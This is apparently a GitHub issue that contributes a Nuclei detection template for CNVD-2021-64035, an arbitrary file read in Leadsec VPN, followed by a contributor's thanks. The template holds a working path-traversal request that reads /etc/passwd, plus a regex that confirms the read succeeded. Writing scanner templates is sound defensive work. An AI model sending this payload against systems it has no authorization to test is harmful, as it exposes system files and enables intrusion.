You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
There is an arbitrary file reading vulnerability in Leadsec VPN, and an attacker can construct a specific URL to achieve arbitrary file reading.
Reference : CNVD-2021-64035 AVD-2021-888761
Nuclei Template:
id: CNVD-2021-64035info:
author: xiaoWangSecname: Leadsec VPN Arbitrary File Readseverity: highdescription: There is an arbitrary file reading vulnerability in Leadsec VPN, and an attacker can construct a specific URL to achieve arbitrary file reading.http:
- method: GETpath:
- "{{BaseURL}}/vpn/user/download/client?ostype=../../../../../../../../../etc/passwd"matchers:
- type: regexregex:
- "root:[x*]:0:0"
The text was updated successfully, but these errors were encountered:
Hello, @DhiyaneshGeek
Thanks, it is works.
And thank you very much for adding to the script, which also helped me to learn the relevant syntax, thanks again.
Template Information:
There is an arbitrary file reading vulnerability in Leadsec VPN, and an attacker can construct a specific URL to achieve arbitrary file reading.
Reference : CNVD-2021-64035
AVD-2021-888761
Nuclei Template:
The text was updated successfully, but these errors were encountered: